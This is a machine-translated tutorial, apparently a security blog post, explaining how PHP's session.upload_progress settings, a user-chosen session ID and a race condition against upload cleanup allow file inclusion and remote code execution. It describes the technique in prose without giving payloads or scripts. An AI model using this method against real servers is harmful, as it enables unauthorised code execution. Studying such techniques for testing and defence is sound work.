Document contains & conditional competition

session.upload_progress
And open_basedir、allow_url_fopen、allow_url_include etc. PHP The configuration is the same ,session.upload_progress It's also PHP A function of , You can also php.ini Set related properties in . Some of the most important settings are as follows ：

session.upload_progress.enabled = on
session.upload_progress.cleanup =on
session.upload_progress.prefix = “upload_progress_”
session.upload_progress.name = “PHP_SESSION_UPLOAD_PROGRESS”

session.upload_progress.enabled Can control whether to turn on session.upload_progress function
session.upload_progress.cleanup You can control whether to delete the file content after uploading
session.upload_progress.prefix You can set the prefix of the uploaded file content
session.upload_progress.name The value is session Key value in

take session.upload_progress.enabled Is set to on when , At this point, when we upload a file to the server ,PHP The details of the file will be ( Such as upload time 、 Upload progress, etc ) Stored in session among .

Then there will be a precondition at this time , Is how to initialize session And the session Write the contents in the file ？
It can be noted that ,php.ini in session.use_strict_mode The default is 0, In this case , Users can define their own sessionid, For example, when the user is cookie Set in sessionid=Lxxx when ,PHP It will generate a file /tmp/sess_Lxxx, At this time, it is initialized session, And the uploaded file information will be written to the file /tmp/sess_Lxxx In the middle

When session.upload_progress.cleanup The value of is on when , Even uploading files , But after uploading, the contents of the file will be cleared , What should I do ？
This time can be used Python The multithreading , Compete conditionally .
utilize session.upload_progress Conduct RCE
One ：
adopt session_start() Ability to open session, Well, if not session_start() Isn't this posture useless . Here we will learn about a new configuration ：session.use_strict_mode

This configuration item is not enabled by default , This means you can define session id, For example, I set... In the request package Cookie by PHPSESSID=haha, Then it will generate a sess_haha Of session file , here php Will be initialized automatically session, And generate a key value , The format is... In the configuration file session.upload_progress.prefix Value + Incoming session.upload_progress.name Value , The key value will be written to session file . According to the relevant configuration written above , The format of the key value should be ：upload_progress_+PHP_SESSION_UPLOAD_PROGRESS Value .
Two ：
because session.upload_progress.cleanup On by default , This leads to the end of the upload ,session Information about the upload progress in the file will be deleted immediately , So how can we include malicious code ：

This problem can be solved by conditional competition , Use burp or python The script keeps sending upload packets , Then send the packets contained in the file in the same way , Can be included